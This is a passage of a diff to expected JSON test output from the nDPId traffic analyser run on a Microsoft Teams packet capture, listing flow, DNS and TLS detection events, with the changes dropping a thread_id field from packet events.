{"query":"substrate.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -216,8 +216,8 @@
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}} 01688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041684501,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041684501,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041684611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041684611}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1587041685090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1587041685090,"pkt":"EBMx8Tl2KDc3AG3ICABFAABJHhYAAP8RGjbAqAEGwKgBAe89ADUANcKVVKoBAAABAAAAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQAB"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1587041685090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1587041685090,"pkt":"EBMx8Tl2KDc3AG3ICABFAABJHhYAAP8RGjbAqAEGwKgBAe89ADUANcKVVKoBAAABAAAAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQAB"}
00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -276,11 +276,11 @@
00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685403,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685403,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041685406} 00185{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041685406}
01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} 01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685546,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685546,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041685611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041685611}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"}
